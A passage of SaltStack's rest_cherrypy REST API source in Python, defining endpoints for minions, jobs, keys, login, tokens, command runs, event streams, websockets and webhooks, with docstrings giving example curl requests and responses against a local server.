[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
"""
return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
"""
Convenience URLs for working with minions
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
"""
cherrypy.request.lowstate = [
{"client": "local", "tgt": mid or "*", "fun": "grains.items"}
]
return {
"return": list(self.exec_lowstate(token=cherrypy.session.get("token"))),
}
def POST(self, **kwargs):
"""
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
"""
job_data = list(
self.exec_lowstate(
client="local_async", token=cherrypy.session.get("token")
)
)
cherrypy.response.status = 202
return {
"return": job_data,
"_links": {
"jobs": [{"href": "/jobs/{0}".format(i["jid"])} for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, jid=None, timeout=""): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
"""
lowstate = {"client": "runner"}
if jid:
lowstate.update({"fun": "jobs.list_job", "jid": jid})
else:
lowstate.update({"fun": "jobs.list_jobs"})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))
ret = {}
if jid:
ret["info"] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get("Result")
for minion in returns:
if u"return" in returns[minion]:
minion_ret[minion] = returns[minion].get(u"return")
else:
minion_ret[minion] = returns[minion].get("return")
ret["return"] = [minion_ret]
else:
ret["return"] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
"""
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
"""
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
"""
if mid:
lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
else:
lowstate = [{"client": "wheel", "fun": "key.list_all"}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get("token"))
return {"return": next(result, {}).get("data", {}).get("return", {})}
@cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
def POST(self, **kwargs):
r"""
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
"""
lowstate = cherrypy.request.lowstate
lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})
if "mid" in lowstate[0]:
lowstate[0]["id_"] = lowstate[0].pop("mid")
result = self.exec_lowstate()
ret = next(result, {}).get("data", {}).get("return", {})
pub_key = ret.get("pub", "")
pub_key_file = tarfile.TarInfo("minion.pub")
pub_key_file.size = len(pub_key)
priv_key = ret.get("priv", "")
priv_key_file = tarfile.TarInfo("minion.pem")
priv_key_file.size = len(priv_key)
fileobj = io.BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode="w")
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, io.BytesIO(pub_key))
tarball.addfile(priv_key_file, io.BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers[
"Content-Disposition"
] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]["id_"])
headers["Content-Type"] = "application/x-tar"
headers["Content-Length"] = len(fileobj.getvalue())
headers["Cache-Control"] = "no-cache"
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
"""
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
"""
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
"""
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
"""
cherrypy.response.headers["WWW-Authenticate"] = "Session"
return {
"status": cherrypy.response.status,
"return": "Please log in",
}
def POST(self, **kwargs):
"""
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
"""
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get("username", None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if "token" not in token:
raise cherrypy.HTTPError(
401, "Could not authenticate using provided credentials"
)
cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
cherrypy.session["token"] = token["token"]
cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
if token["eauth"] == "django" and "^model" in eauth:
perms = token["auth_list"]
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token["name"], [])
perms.extend(eauth.get("*", []))
if "groups" in token and token["groups"]:
user_groups = set(token["groups"])
eauth_groups = set(
[i.rstrip("%") for i in eauth.keys() if i.endswith("%")]
)
for group in user_groups & eauth_groups:
perms.extend(eauth["{0}%".format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception: # pylint: disable=broad-except
logger.debug(
"Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'.".format(
token.get("eauth"), token.get("name")
),
exc_info=True,
)
perms = None
return {
"return": [
{
"token": cherrypy.session.id,
"expire": token["expire"],
"start": token["start"],
"user": token["name"],
"eauth": token["eauth"],
"perms": perms or {},
}
]
}
class Logout(LowDataAdapter):
"""
Class to remove or invalidate sessions
"""
_cp_config = dict(
LowDataAdapter._cp_config,
**{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
)
def POST(self): # pylint: disable=arguments-differ
"""
Destroy the currently active session and expire the session cookie
"""
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
"""
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
"""
@cherrypy.config(**{"tools.sessions.on": False})
def POST(self, **kwargs):
r"""
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
"""
for creds in cherrypy.request.lowstate:
try:
creds.update(
{
"client": "runner",
"fun": "auth.mk_token",
"kwarg": {
"username": creds["username"],
"password": creds["password"],
"eauth": creds["eauth"],
},
}
)
except KeyError:
raise cherrypy.HTTPError(
400, 'Require "username", "password", and "eauth" params'
)
return list(self.exec_lowstate())
class Run(LowDataAdapter):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`.
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})
def POST(self, **kwargs):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`. Otherwise, this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem. When using salt-ssh, eauth credentials must also be
supplied, and are subject to :ref:`eauth access-control lists <acl>`.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='auto' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
**Example SSH response:**
.. code-block:: text
return:
- silver:
_stamp: '2020-09-08T23:04:28.912609'
fun: test.ping
fun_args: []
id: silver
jid: '20200908230427905565'
retcode: 0
return: true
"""
return {
"return": list(self.exec_lowstate()),
}
class Events(object):
"""
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
"""
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
"""
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get("token", auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r"""
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
"""
cookies = cherrypy.request.cookie
auth_token = (
token
or salt_token
or (cookies["session_id"].value if "session_id" in cookies else None)
)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers["Content-Type"] = "text/event-stream"
cherrypy.response.headers["Cache-Control"] = "no-cache"
cherrypy.response.headers["Connection"] = "keep-alive"
def listen():
"""
An iterator to yield Salt events
"""
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
yield str("retry: 400\n") # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield str("tag: {0}\n").format(
data.get("tag", "")
) # future lint: disable=blacklisted-function
yield str("data: {0}\n\n").format(
salt.utils.json.dumps(data)
) # future lint: disable=blacklisted-function
return listen()
class WebsocketEndpoint(object):
"""
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
"tools.websocket.on": True,
"tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
"""
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
"""
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get("token")
else:
salt_token = cherrypy.session.get("token")
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
"""
An iterator to return Salt events (and optionally format them)
"""
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if "format_events" in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
str("data: {0}\n\n").format(
salt.utils.json.dumps(data)
), # future lint: disable=blacklisted-function
False,
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}".format(data)
)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
"""
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
"""
exposed = True
tag_base = ["salt", "netapi", "hook"]
_cp_config = dict(
LowDataAdapter._cp_config,
**{
# Don't do any lowdata processing on the POST data
"tools.lowdata_fmt.on": True,
# Auth can be overridden in __init__().
"tools.salt_auth.on": True,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=False,
)
if cherrypy.config["apiopts"].get("webhook_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def POST(self, *args, **kwargs):
"""
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
